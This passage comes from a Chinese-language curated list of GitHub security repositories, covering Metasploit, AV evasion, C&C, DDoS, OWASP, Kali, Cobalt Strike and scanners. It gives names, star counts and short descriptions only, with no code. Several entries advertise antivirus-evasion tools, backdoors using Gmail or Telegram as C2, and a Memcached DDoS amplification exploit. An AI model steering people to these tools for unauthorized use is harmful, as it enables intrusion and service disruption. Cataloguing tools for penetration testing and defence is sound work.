[fozavci/viproy-voipkit](https://github.com/fozavci/viproy-voipkit) VoIP渗透测试工具和 Metasploit 框架\n - 重复区段: [渗透->工具->未分类-Pentest](#2e40f2f1df5d7f93a7de47bf49c24a0e) |\n- [**279**星][3m] [Vue] [zerx0r/kage](https://github.com/Zerx0r/Kage) Kage is Graphical User Interface for Metasploit Meterpreter and Session Handler\n\n\n\n\n### 免杀&&躲避AV检测\n\n\n- [**1032**星][5m] [C] [govolution/avet](https://github.com/govolution/avet) 免杀工具\n- [**733**星][10m] [Py] [mr-un1k0d3r/dkmc](https://github.com/mr-un1k0d3r/dkmc) DKMC - Dont kill my cat - Malicious payload evasion tool\n- [**686**星][7m] [Py] [paranoidninja/carboncopy](https://github.com/paranoidninja/carboncopy) A tool which creates a spoofed certificate of any online website and signs an Executable for AV Evasion. Works for both Windows and Linux\n- [**472**星][18d] [Go] [arvanaghi/checkplease](https://github.com/arvanaghi/checkplease) Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust.\n- [**316**星][1m] [C#] [ch0pin/aviator](https://github.com/ch0pin/aviator) Antivirus evasion project\n- [**302**星][1y] [Py] [two06/inception](https://github.com/two06/inception) Provides In-memory compilation and reflective loading of C# apps for AV evasion.\n- [**276**星][2m] [C#] [hackplayers/salsa-tools](https://github.com/hackplayers/salsa-tools) Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY and AV bypass, AMSI patched\n\n\n### C&C\n\n\n- [**2490**星][4m] [Go] [ne0nd0g/merlin](https://github.com/ne0nd0g/merlin) Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.\n- [**1826**星][6m] [C++] [iagox86/dnscat2](https://github.com/iagox86/dnscat2) 在 DNS 协议上创建加密的 C&C channel\n- [**1110**星][1y] [Py] [byt3bl33d3r/gcat](https://github.com/byt3bl33d3r/gcat) A PoC backdoor that uses Gmail as a C&C server\n- [**994**星][2m] [C#] [cobbr/covenant](https://github.com/cobbr/covenant) Covenant is a collaborative .NET C2 framework for red teamers.\n- [**633**星][11m] [Py] [mehulj94/braindamage](https://github.com/mehulj94/braindamage) Remote administration tool which uses Telegram as a C&C server\n- [**596**星][19d] [Py] [trustedsec/trevorc2](https://github.com/trustedsec/trevorc2) 通过正常的可浏览的网站隐藏 C&C 指令的客户端/服务器模型,因为时间间隔不同,检测变得更加困难,并且获取主机数据时不会使用 POST 请求\n- [**320**星][1y] [C#] [spiderlabs/dohc2](https://github.com/spiderlabs/dohc2) DoHC2 allows the ExternalC2 library from Ryan Hanson (\n- [**283**星][t] [PS] [nettitude/poshc2](https://github.com/nettitude/poshc2) Python Server for PoshC2\n- [**280**星][4d] [PS] [nettitude/poshc2](https://github.com/nettitude/PoshC2) Python Server for PoshC2\n- [**207**星][1y] [C#] [damonmohammadbagher/nativepayload_dns](https://github.com/damonmohammadbagher/nativepayload_dns) 使用DNS流量传输Payload,绕过杀软。C#编写\n- [**201**星][1y] [Py] [sec-bit/awesome-buggy-erc20-tokens](https://github.com/sec-bit/awesome-buggy-erc20-tokens) A Collection of Vulnerabilities in ERC20 Smart Contracts With Tokens Affected\n\n\n### DDOS\n\n\n- [**2466**星][1m] [C++] [pavel-odintsov/fastnetmon](https://github.com/pavel-odintsov/fastnetmon) 快速 DDoS 检测/分析工具,支持 sflow/netflow/mirror\n- [**1268**星][4d] [Shell] [mitchellkrogza/nginx-ultimate-bad-bot-blocker](https://github.com/mitchellkrogza/nginx-ultimate-bad-bot-blocker) Nginx Block Bad Bots, Spam Referrer Blocker, Vulnerability Scanners, User-Agents, Malware, Adware, Ransomware, Malicious Sites, with anti-DDOS, Wordpress Theme Detector Blocking and Fail2Ban Jail for Repeat Offenders\n- [**858**星][3m] [Py] [649/memcrashed-ddos-exploit](https://github.com/649/memcrashed-ddos-exploit) DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API\n - 重复区段: [侦察->工具->Shodan](#18c7c1df2e6ae5e9135dfa2e4eb1d4db) |\n- [**510**星][3m] [JS] [acmesec/pocbox](https://github.com/Acmesec/PoCBox) 赏金猎人的脆弱性测试辅助平台\n- [**476**星][16d] [JS] [codemanki/cloudscraper](https://github.com/codemanki/cloudscraper) Node.js library to bypass cloudflare's anti-ddos page\n- [**468**星][7m] [Shell] [jgmdev/ddos-deflate](https://github.com/jgmdev/ddos-deflate) Fork of DDoS Deflate with fixes, improvements and new features.\n- [**385**星][1y] [C] [markus-go/bonesi](https://github.com/markus-go/bonesi) BoNeSi - the DDoS Botnet Simulator\n- [**301**星][4m] [Shell] [anti-ddos/anti-ddos](https://github.com/anti-ddos/Anti-DDOS) \n- [**265**星][1y] [Py] [wenfengshi/ddos-dos-tools](https://github.com/wenfengshi/ddos-dos-tools) some sort of ddos-tools\n\n\n### OWASP\n\n\n- [**11306**星][2d] [Py] [owasp/cheatsheetseries](https://github.com/owasp/cheatsheetseries) The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.\n- [**5084**星][7d] [HTML] [owasp/owasp-mstg](https://github.com/owasp/owasp-mstg) 关于移动App安全开发、测试和逆向的相近手册\n- [**2434**星][13d] [Go] [owasp/amass](https://github.com/owasp/amass) In-depth Attack Surface Mapping and Asset Discovery\n- [**1964**星][10d] [Perl] [spiderlabs/owasp-modsecurity-crs](https://github.com/spiderlabs/owasp-modsecurity-crs) OWASP ModSecurity Core Rule Set (CRS) Project (Official Repository)\n- [**1417**星][3m] [HTML] [owasp/top10](https://github.com/owasp/top10) Official OWASP Top 10 Document Repository\n- [**1056**星][3m] [HTML] [owasp/nodegoat](https://github.com/owasp/nodegoat) 学习OWASP安全威胁Top10如何应用到Web App的,以及如何处理\n- [**752**星][2d] [Java] [owasp/securityshepherd](https://github.com/owasp/securityshepherd) Web and mobile application security training platform\n- [**698**星][7d] [HTML] [owasp/asvs](https://github.com/owasp/asvs) Application Security Verification Standard\n- [**625**星][9d] [Py] [zdresearch/owasp-nettacker](https://github.com/zdresearch/OWASP-Nettacker) Automated Penetration Testing Framework\n- [**559**星][6d] [Shell] [owasp/owasp-masvs](https://github.com/owasp/owasp-masvs) OWASP 移动App安全标准\n- [**503**星][10d] [owasp/wstg](https://github.com/OWASP/wstg) The OWASP Web Security Testing Guide includes a \"best practice\" penetration testing framework which users can implement in their own organizations and a \"low level\" penetration testing guide that describes techniques for testing most common web application and web service security issues.\n- [**503**星][10d] [owasp/wstg](https://github.com/owasp/wstg) The OWASP Web Security Testing Guide includes a \"best practice\" penetration testing framework which users can implement in their own organizations and a \"low level\" penetration testing guide that describes techniques for testing most common web application and web service security issues.\n- [**466**星][8m] [Java] [owasp/owasp-webscarab](https://github.com/owasp/owasp-webscarab) OWASP WebScarab\n- [**422**星][5m] [Py] [stanislav-web/opendoor](https://github.com/stanislav-web/opendoor) OWASP WEB Directory Scanner\n- [**370**星][4d] [Java] [zaproxy/zap-extensions](https://github.com/zaproxy/zap-extensions) OWASP ZAP Add-ons\n- [**348**星][2m] [Java] [esapi/esapi-java-legacy](https://github.com/esapi/esapi-java-legacy) ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications.\n- [**305**星][5m] [0xradi/owasp-web-checklist](https://github.com/0xradi/owasp-web-checklist) OWASP Web Application Security Testing Checklist\n- [**297**星][5m] [tanprathan/owasp-testing-checklist](https://github.com/tanprathan/owasp-testing-checklist) OWASP based Web Application Security Testing Checklist is an Excel based checklist which helps you to track the status of completed and pending test cases.\n- [**286**星][5m] [JS] [mike-goodwin/owasp-threat-dragon](https://github.com/mike-goodwin/owasp-threat-dragon) An open source, online threat modelling tool from OWASP\n- [**258**星][2m] [owasp/api-security](https://github.com/owasp/api-security) OWASP API Security Project\n- [**255**星][12m] [Java] [owasp/owasp-java-encoder](https://github.com/owasp/owasp-java-encoder) The OWASP Java Encoder is a Java 1.5+ simple-to-use drop-in high-performance encoder class with no dependencies and little baggage. This project will help Java web developers defend against Cross Site Scripting!\n- [**208**星][17d] [Java] [owasp/benchmark](https://github.com/owasp/benchmark) OWASP Benchmark is a test suite designed to verify the speed and accuracy of software vulnerability detection tools. A fully runnable web app written in Java, it supports analysis by Static (SAST), Dynamic (DAST), and Runtime (IAST) tools that support Java. The idea is that since it is fully runnable and all the vulnerabilities are actually expl…\n\n\n### Kali\n\n\n- [**2538**星][8m] [offensive-security/kali-nethunter](https://github.com/offensive-security/kali-nethunter) The Kali NetHunter Project\n- [**2436**星][8m] [Py] [lionsec/katoolin](https://github.com/lionsec/katoolin) Automatically install all Kali linux tools\n- [**1699**星][3m] [PHP] [xtr4nge/fruitywifi](https://github.com/xtr4nge/fruitywifi) FruityWiFi is a wireless network auditing tool. The application can be installed in any Debian based system (Jessie) adding the extra packages. Tested in Debian, Kali Linux, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi), Bugtraq, NetHunter.\n- [**879**星][11m] [Shell] [esc0rtd3w/wifi-hacker](https://github.com/esc0rtd3w/wifi-hacker) Shell Script For Attacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2)\n- [**769**星][13d] [Py] [rajkumrdusad/tool-x](https://github.com/rajkumrdusad/tool-x) Tool-X is a kali linux hacking Tool installer. Tool-X developed for termux and other android terminals. using Tool-X you can install almost 370+ hacking tools in termux app and other linux based distributions.\n- [**675**星][8m] [offensive-security/kali-arm-build-scripts](https://github.com/offensive-security/kali-arm-build-scripts) Kali Linux ARM build scripts\n- [**556**星][2m] [Shell] [offensive-security/kali-linux-docker](https://github.com/offensive-security/kali-linux-docker) PLEASE USE GITLAB\n- [**425**星][4m] [jack-liang/kalitools](https://github.com/jack-liang/kalitools) Kali Linux工具清单\n- [**336**星][8m] [offensive-security/kali-linux-recipes](https://github.com/offensive-security/kali-linux-recipes) Kali Linux Recipes\n- [**316**星][2m] [Shell] [brainfucksec/kalitorify](https://github.com/brainfucksec/kalitorify) 用于Kali的shell脚本,使用iptables创建通过Tor网络的透明代理。可以执行各种检查:检查Tor出口节点(即在Tor代理下时的公共IP),或者Tor已正确配置,可以检查服务和网络设置。\n- [**273**星][27d] [C++] [steve-m/kalibrate-rtl](https://github.com/steve-m/kalibrate-rtl) fork of\n- [**203**星][5m] [jiansiting/kali-windows](https://github.com/jiansiting/kali-windows) Kali Windows\n\n\n### CobaltStrike\n\n\n- [**1072**星][9d] [C#] [k8gege/ladon](https://github.com/k8gege/ladon) 大型内网渗透扫描器&Cobalt Strike,包含信息收集/端口扫描/服务识别/网络资产/密码爆破/漏洞检测/漏洞利用。漏洞检测含MS17010、Weblogic、ActiveMQ、Tomcat等,密码口令爆破含(Mysql、Oracle、MSSQL)、FTP、SSH(Linux)、VNC、Windows(IPC、WMI、SMB)等,可高度自定义插件支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器一键生成Web漏洞POC,可快速扩展扫描或利用能力。支持Cobalt Strike插件化直接内存加载Ladon扫描快速拓展内网横向移动\n- [**770**星][5m] [aleenzz/cobalt_strike_wiki](https://github.com/aleenzz/cobalt_strike_wiki) Cobalt Strike系列\n- [**474**星][1m] [Py] [k8gege/k8cscan](https://github.com/k8gege/k8cscan) 大型内网渗透自定义插件化扫描神器,包含信息收集、网络资产、漏洞扫描、密码爆破、漏洞利用,程序采用多线程批量扫描大型内网多个IP段C段主机,目前插件包含: C段旁注扫描、子域名扫描、Ftp密码爆破、Mysql密码爆破、Oracle密码爆破、MSSQL密码爆破、Windows/Linux系统密码爆破、存活主机扫描、端口扫描、Web信息探测、操作系统版本探测、Cisco思科设备扫描等,支持调用任意外部程序或脚本,支持Cobalt Strike联动\n- [**397**星][1y] [Shell] [killswitch-gui/cobaltstrike-toolkit](https://github.com/killswitch-gui/cobaltstrike-toolkit) Some useful scripts for CobaltStrike\n- [**287**星][7m] [JS] [joshuaferrara/node-csgo](https://github.com/joshuaferrara/node-csgo) A node-steam plugin for Counter-Strike: Global Offensive.\n- [**217**星][12d] [JS] [saul/demofile](https://github.com/saul/demofile) Node.js library for parsing Counter-Strike: Global Offensive demo files\n- [**215**星][9m] [PS] [outflanknl/excel4-dcom](https://github.com/outflanknl/excel4-dcom) PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe)\n- [**207**星][1y] [C#] [spiderlabs/sharpcompile](https://github.com/spiderlabs/sharpcompile) SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing…\n\n\n### CMS\n\n\n\n\n### 日志\n\n\n\n\n### 劫持&&各种劫持\n\n\n#### 未分类-Hijack\n\n\n- [**1417**星][1m] [Java] [chrisk44/hijacker](https://github.com/chrisk44/hijacker) Aircrack, Airodump, Aireplay, MDK3 and Reaver GUI Application for Android\n- [**554**星][6m] [Py] [owasp/qrljacking](https://github.com/owasp/qrljacking) 一个简单的能够进行会话劫持的社会工程攻击向量,影响所有使用“使用 QR 码登录”作为安全登录方式的应用程序。( Quick Response CodeLogin Jacking)\n\n\n#### 点击劫持\n\n\n\n\n\n\n### RedTeam\n\n\n- [**617**星][19d] [Py] [facebookincubator/weasel](https://github.com/facebookincubator/weasel) DNS covert channel implant for Red Teams.\n- [**542**星][8m] [Py] [wyatu/perun](https://github.com/wyatu/perun) 主要适用于乙方安服、渗透测试人员和甲方RedTeam红队人员的网络资产漏洞扫描器/扫描框架\n- [**476**星][13d] [PS] [mantvydasb/redteam-tactics-and-techniques](https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques) Red Teaming Tactics and Techniques\n- [**357**星][2m] [C] [nccgroup/phantap](https://github.com/nccgroup/phantap) Phantom Tap (PhanTap) - an ‘invisible’ network tap aimed at red teams\n- [**221**星][2m] [Py] [khast3x/redcloud](https://github.com/khast3x/redcloud) Comfy & powerful Red Team Infrastructure deployement using Docker\n- [**220**星][9m] [Py] [coalfire-research/deathmetal](https://github.com/coalfire-research/deathmetal) Red team & penetration testing tools to exploit the capabilities of Intel AMT\n- [**217**星][1y] [foobarto/redteam-notebook](https://github.com/foobarto/redteam-notebook) Collection of commands, tips and tricks and references I found useful during preparation for OSCP exam.\n\n\n### BlueTeam\n\n\n- [**883**星][4m] [CSS] [outflanknl/redelk](https://github.com/outflanknl/redelk) 跟踪和警告Blue Team活动以及长期运营中的更高可用性\n- [**639**星][5m] [smgorelik/windows-rce-exploits](https://github.com/smgorelik/windows-rce-exploits) The exploit samples database is a repository for **RCE** (remote code execution) exploits and Proof-of-Concepts for **WINDOWS**, the samples are uploaded for education purposes for red and blue teams.\n- [**409**星][1y] [C] [ww9210/linux_kernel_exploits](https://github.com/ww9210/linux_kernel_exploits) Repo for FUZE project. I will also publish some Linux kernel LPE exploits for various real world kernel vulnerabilities here. the samples are uploaded for education purposes for red and blue teams.\n- [**261**星][11d] [Ruby] [evait-security/envizon](https://github.com/evait-security/envizon) 网络可视化工具, 在渗透测试中快速识别最可能的目标\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加的\n\n\n\n\n### Metasploit\n\n\n\n\n### BurpSuite\n\n\n\n\n### CobaltStrike \n\n\n\n\n\n\n# 扫描器&&安全扫描&&App扫描&&漏洞扫描\n\n\n***\n\n\n## 工具\n\n\n### 未分类-Scanner\n\n\n- [**11486**星][3m] [C] [robertdavidgraham/masscan](https://github.com/robertdavidgraham/masscan) masscan:世界上最快的互联网端口扫描器,号称可6分钟内扫描整个互联网\n- [**7449**星][3d] [Py] [s0md3v/xsstrike](https://github.com/s0md3v/XSStrike) Most advanced XSS scanner.\n- [**5351**星][15d] [Go] [zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) Audit git repos for secrets\n- [**4563**星][8d] [Ruby] [wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) WPScan is a free, for non-commercial use, black box WordPress Vulnerability Scanner written for security professionals and blog maintainers to test the security of their WordPress websites.\n- [**4215**星][24d] [we5ter/scanners-box](https://github.com/we5ter/scanners-box) 安全行业从业者自研开源扫描器合辑\n- [**3455**星][26d] [Perl] [sullo/nikto](https://github.com/sullo/nikto) Nikto web server scanner\n- [**3279**星][20d] [Go] [mozilla/sops](https://github.com/mozilla/sops) Simple and flexible tool for managing secrets\n- [**3252**星][26d] [Py] [maurosoria/dirsearch](https://github.com/maurosoria/dirsearch) Web path scanner\n- [**3092**星][3m] [C] [zmap/zmap](https://github.com/zmap/zmap) ZMap is a fast single packet network scanner designed for Internet-wide network surveys.\n- [**2960**星][2m] [Py] [andresriancho/w3af](https://github.com/andresriancho/w3af) Web App安全扫描器, 辅助开发者和渗透测试人员识别和利用Web App中的漏洞\n- [**2669**星][20d] [Py] [cloudflare/flan](https://github.com/cloudflare/flan) A pretty sweet vulnerability scanner\n- [**2287**星][4m] [JS] [retirejs/retire.js](https://github.com/retirejs/retire.js) scanner detecting the use of JavaScript libraries with known vulnerabilities\n- [**2113**星][12d] [Ruby] [urbanadventurer/whatweb](https://github.com/urbanadventurer/whatweb) Next generation web scanner\n- [**2050**星][23d] [Py] [nabla-c0d3/sslyze](https://github.com/nabla-c0d3/sslyze) SSL/TLS服务器扫描\n- [**1682**星][2m] [NSIS] [angryip/ipscan](https://github.com/angryip/ipscan) Angry IP Scanner - fast and friendly network scanner\n- [**1560**星][8m] [Py] [m4ll0k/wascan](https://github.com/m4ll0k/WAScan) WAScan - Web Application Scanner\n- [**1511**星][9d] [Py] [hannob/snallygaster](https://github.com/hannob/snallygaster) Python脚本, 扫描HTTP服务器\"秘密文件\"\n- [**1139**星][24d] [Py] [gerbenjavado/linkfinder](https://github.com/gerbenjavado/linkfinder) A python script that finds endpoints in JavaScript files\n- [**1102**星][3m] [PHP] [tuhinshubhra/red_hawk](https://github.com/tuhinshubhra/red_hawk) 信息收集、漏洞扫描、爬虫多合一\n - 重复区段: [侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) |\n- [**1076**星][8m] [Py] [lucifer1993/struts-scan](https://github.com/lucifer1993/struts-scan) struts2漏洞全版本检测和利用工具\n- [**1062**星][4m] [Py] [h4ckforjob/dirmap](https://github.com/h4ckforjob/dirmap) 一个高级web目录、文件扫描工具,功能将会强于DirBuster、Dirsearch、cansina、御剑。\n- [**935**星][6m] [PHP] [tidesec/wdscanner](https://github.com/tidesec/wdscanner) 分布式web漏洞扫描、客户管理、漏洞定期扫描、子域名枚举、端口扫描、网站爬虫、暗链检测、坏链检测、网站指纹搜集、专项漏洞检测、代理搜集及部署等功能。\n- [**933**星][3m] [Py] [tuhinshubhra/cmseek](https://github.com/tuhinshubhra/cmseek) CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 170 other CMSs\n- [**896**星][20d] [Py] [ajinabraham/nodejsscan](https://github.com/ajinabraham/nodejsscan) NodeJsScan is a static security code scanner for Node.js applications.\n- [**855**星][12d] [JS] [cloudsploit/scans](https://github.com/cloudsploit/scans) Cloud security configuration checks\n- [**767**星][2m] [Py] [vesche/scanless](https://github.com/vesche/scanless) 端口扫描器\n- [**758**星][2m] [Py] [nekmo/dirhunt](https://github.com/nekmo/dirhunt) Web爬虫, 针对搜索和分析路径做了优化\n - 重复区段: [爬虫->工具->未分类](#442f9390fd56008def077a21ab65d4aa) |\n- [**734**星][7m] [Py] [ztgrace/changeme](https://github.com/ztgrace/changeme) 默认证书扫描器\n- [**725**星][14d] [CSS] [w-digital-scanner/w12scan](https://github.com/w-digital-scanner/w12scan) a network asset discovery engine that can automatically aggregate related assets for analysis and use\n- [**704**星][23d] [Py] [grayddq/gscan](https://github.com/grayddq/gscan) 本程序旨在为安全应急响应人员对Linux主机排查时提供便利,实现主机侧Checklist的自动全面化检测,根据检测结果自动数据聚合,进行黑客攻击路径溯源。\n- [**703**星][5m] [CSS] [ajinabraham/cmsscan](https://github.com/ajinabraham/cmsscan) Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues\n- [**702**星][1m] [C] [scanmem/scanmem](https://github.com/scanmem/scanmem) memory scanner for Linux\n- [**686**星][14d] [Py] [kevthehermit/pastehunter](https://github.com/kevthehermit/pastehunter) Scanning pastebin with yara rules\n- [**671**星][8m] [Py] [m4ll0k/wpseku](https://github.com/m4ll0k/wpseku) WPSeku - Wordpress Security Scanner\n- [**671**星][2m] [Ruby] [mozilla/ssh_scan](https://github.com/mozilla/ssh_scan) A prototype SSH configuration and policy scanner (Blog:\n- [**669**星][6m] [Py] [droope/droopescan](https://github.com/droope/droopescan) A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.\n- [**665**星][6m] [Py] [rabbitmask/weblogicscan](https://github.com/rabbitmask/weblogicscan) Weblogic一键漏洞检测工具,V1.3\n- [**641**星][1y] [Py] [lmco/laikaboss](https://github.com/lmco/laikaboss) Laika BOSS: Object Scanning System\n- [**618**星][5m] [Py] [faizann24/xsspy](https://github.com/faizann24/xsspy) Web Application XSS Scanner\n- [**610**星][1y] [Ruby] [thesp0nge/dawnscanner](https://github.com/thesp0nge/dawnscanner) Dawn is a static analysis security scanner for ruby written web applications. It supports Sinatra, Padrino and Ruby on Rails frameworks.\n- [**578**星][8d] [Py] [codingo/vhostscan](https://github.com/codingo/vhostscan) A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.\n- [**576**星][3m] [Perl] [alisamtechnology/atscan](https://github.com/alisamtechnology/atscan) Advanced dork Search & Mass Exploit Scanner\n- [**574**星][2m] [HTML] [gwillem/magento-malware-scanner](https://github.com/gwillem/magento-malware-scanner) 用于检测 Magento 恶意软件的规则/样本集合\n- [**563**星][8m] [Go] [marco-lancini/goscan](https://github.com/marco-lancini/goscan) Interactive Network Scanner\n- [**539**星][5m] [Py] [cisagov/pshtt](https://github.com/cisagov/pshtt) Scan domains and return data based on HTTPS best practices\n- [**485**星][2m] [Py] [fcavallarin/htcap](https://github.com/fcavallarin/htcap) htcap is a web application scanner able to crawl single page application (SPA) recursively by intercepting ajax calls and DOM changes.\n- [**476**星][1y] [C] [nanshihui/scan-t](https://github.com/nanshihui/scan-t) a new crawler based on python with more function including Network fingerprint search\n- [**442**星][11d] [Py] [w-digital-scanner/w13scan](https://github.com/w-digital-scanner/w13scan) Passive Security Scanner (被动式安全扫描器)\n- [**401**星][11m] [JS] [eviltik/evilscan](https://github.com/eviltik/evilscan) 大规模 IP/端口扫描器,Node.js 编写\n- [**400**星][1y] [Py] [grayddq/publicmonitors](https://github.com/grayddq/publicmonitors) 对公网IP列表进行端口服务扫描,发现周期内的端口服务变化情况和弱口令安全风险\n- [**398**星][t] [C] [hasherezade/hollows_hunter](https://github.com/hasherezade/hollows_hunter) Scans all running processes. Recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).\n- [**393**星][11m] [Py] [mitre/multiscanner](https://github.com/mitre/multiscanner) Modular file scanning/analysis framework\n- [**384**星][1m] [Py] [stamparm/dsss](https://github.com/stamparm/dsss) Damn Small SQLi Scanner\n- [**376**星][1m] [Py] [skavngr/rapidscan](https://github.com/skavngr/rapidscan) | The Multi-Tool Web Vulnerability Scanner.\n- [**368**星][4d] [Swift] [evermeer/passportscanner](https://github.com/evermeer/passportscanner) Scan the MRZ code of a passport and extract the firstname, lastname, passport number, nationality, date of birth, expiration date and personal numer.\n- [**356**星][5m] [Py] [swisskyrepo/wordpresscan](https://github.com/swisskyrepo/wordpresscan) WPScan rewritten in Python + some WPSeku ideas\n- [**346**星][4m] [Java] [portswigger/backslash-powered-scanner](https://github.com/portswigger/backslash-powered-scanner) Finds unknown classes of injection vulnerabilities\n- [**343**星][28d] [Py] [fgeek/pyfiscan](https://github.com/fgeek/pyfiscan) Web App 漏洞及版本扫描\n- [**333**星][1y] [Py] [flipkart-incubator/rta](https://github.com/flipkart-incubator/rta) Red team Arsenal - An intelligent scanner to detect security vulnerabilities in company's layer 7 assets.\n- [**330**星][2d] [C] [royhills/arp-scan](https://github.com/royhills/arp-scan) The ARP Scanner\n- [**320**星][12d] [HTML] [coinbase/salus](https://github.com/coinbase/salus) Security scanner coordinator\n- [**314**星][1m] [PS] [canix1/adaclscanner](https://github.com/canix1/adaclscanner) Repo for ADACLScan.ps1 - Your number one script for ACL's in Active Directory\n- [**305**星][3m] [Ruby] [m0nad/hellraiser](https://github.com/m0nad/hellraiser) Vulnerability Scanner\n- [**303**星][10m] [PHP] [steverobbins/magescan](https://github.com/steverobbins/magescan) Scan a Magento site for information\n- [**301**星][6d] [Shell] [mitchellkrogza/apache-ultimate-bad-bot-blocker](https://github.com/mitchellkrogza/apache-ultimate-bad-bot-blocker) Apache Block Bad Bots, (Referer) Spam Referrer Blocker, Vulnerability Scanners, Malware, Adware, Ransomware, Malicious Sites, Wordpress Theme Detectors and Fail2Ban Jail for Repeat Offenders\n- [**296**星][9m] [Py] [boy-hack/w8fuckcdn](https://github.com/boy-hack/w8fuckcdn) 通过扫描全网绕过CDN获取网站IP地址\n- [**296**星][1y] [Shell] [cryptolok/ghostinthenet](https://github.com/cryptolok/ghostinthenet) Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan\n- [**293**星][5m] [enkomio/taipan](https://github.com/enkomio/Taipan) Web application vulnerability scanner\n- [**288**星][1m] [Go] [zmap/zgrab2](https://github.com/zmap/zgrab2) Go Application Layer Scanner\n- [**287**星][4d] [Py] [target/strelka](https://github.com/target/strelka) Real-time, container-based file scanning at enterprise scale\n- [**287**星][2m] [Py] [xdavidhu/portspider](https://github.com/xdavidhu/portspider) A lightning fast multithreaded network scanner framework with modules.\n- [**285**星][1y] [Py] [code-scan/dzscan](https://github.com/code-scan/dzscan) Dzscan\n- [**282**星][4m] [Py] [shenril/sitadel](https://github.com/shenril/sitadel) Web Application Security Scanner\n- [**271**星][14d] [Py] [abhisharma404/vault](https://github.com/abhisharma404/vault) swiss army knife for hackers\n- [**263**星][3m] [Py] [m4ll0k/konan](https://github.com/m4ll0k/Konan) Konan - Advanced Web Application Dir Scanner\n- [**252**星][24d] [Swift] [netyouli/whc_scan](https://github.com/netyouli/whc_scan) 高效强大扫描分析iOS和Android项目里没有使用的类Mac开源工具,清理项目垃圾类,让项目结构干净清爽,升级维护得心应手. Efficient and powerful scanning analysis iOS and Android project no classes used in Mac open source tools, cleaning rubbish class project, make project structure clean and relaxed, upgrade maintenance\n- [**251**星][10m] [jeffzh3ng/insectsawake](https://github.com/jeffzh3ng/insectsawake) Network Vulnerability Scanner\n- [**246**星][2m] [Py] [gildasio/h2t](https://github.com/gildasio/h2t) h2t (HTTP Hardening Tool) scans a website and suggests security headers to apply\n- [**239**星][2m] [PHP] [psecio/versionscan](https://github.com/psecio/versionscan) A PHP version scanner for reporting possible vulnerabilities\n- [**237**星][8m] [Go] [gocaio/goca](https://github.com/gocaio/goca) Goca Scanner\n- [**225**星][6m] [Py] [rub-nds/corstest](https://github.com/rub-nds/corstest) A simple CORS misconfiguration scanner\n- [**224**星][6m] [JS] [pavanw3b/sh00t](https://github.com/pavanw3b/sh00t) Security Testing is not as simple as right click > Scan. It's messy, a tough game. What if you had missed to test just that one thing and had to regret later? Sh00t is a highly customizable, intelligent platform that understands the life of bug hunters and emphasizes on manual security testing.\n- [**220**星][1y] [Py] [dionach/cmsmap](https://github.com/dionach/cmsmap) CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.\n- [**216**星][4m] [Py] [iojw/socialscan](https://github.com/iojw/socialscan) Check email address and username availability on online platforms with 100% accuracy\n- [**213**星][10m] [Py] [nullarray/dorknet](https://github.com/nullarray/dorknet) Selenium powered Python script to automate searching for vulnerable web apps.\n- [**208**星][4m] [Py] [lengjibo/dedecmscan](https://github.com/lengjibo/dedecmscan) 织梦全版本漏洞扫描\n- [**202**星][1y] [PS] [sud0woodo/dcomrade](https://github.com/sud0woodo/dcomrade) Powershell script for enumerating vulnerable DCOM Applications\n\n\n### 隐私&&Secret&&Privacy扫描\n\n\n- [**6861**星][30d] [Shell] [awslabs/git-secrets](https://github.com/awslabs/git-secrets) Prevents you from committing secrets and credentials into git repositories\n- [**4468**星][1m] [Py] [jofpin/trape](https://github.com/jofpin/trape) 学习在互联网上跟踪别人,获取其详细信息,并避免被别人跟踪\n- [**3091**星][5d] [Py] [tribler/tribler](https://github.com/tribler/tribler) Privacy enhanced BitTorrent client with P2P content discovery\n- [**2204**星][1m] [sobolevn/awesome-cryptography](https://github.com/sobolevn/awesome-cryptography) A curated list of cryptography resources and links.\n- [**1141**星][5m] [Vue] [0xbug/hawkeye](https://github.com/0xbug/hawkeye) GitHub 泄露监控系统(GitHub Sensitive Information Leakage Monitor Spider)\n- [**955**星][19d] [Py] [mozilla/openwpm](https://github.com/mozilla/OpenWPM) A web privacy measurement framework\n- [**932**星][5d] [C#] [elevenpaths/foca](https://github.com/elevenpaths/foca) Tool to find metadata and hidden information in the documents.\n- [**892**星][2m] [Py] [al0ne/vxscan](https://github.com/al0ne/vxscan) python3写的综合扫描工具,主要用来存活验证,敏感文件探测(目录扫描/js泄露接口/html注释泄露),WAF/CDN识别,端口扫描,指纹/服务识别,操作系统识别,POC扫描,SQL注入,绕过CDN,查询旁站等功能,主要用来甲方自测或乙方授权测试,请勿用来搞破坏。\n- [**395**星][7m] [Py] [repoog/gitprey](https://github.com/repoog/gitprey) Searching sensitive files and contents in GitHub associated to company name or other key words\n- [**355**星][2m] [Py] 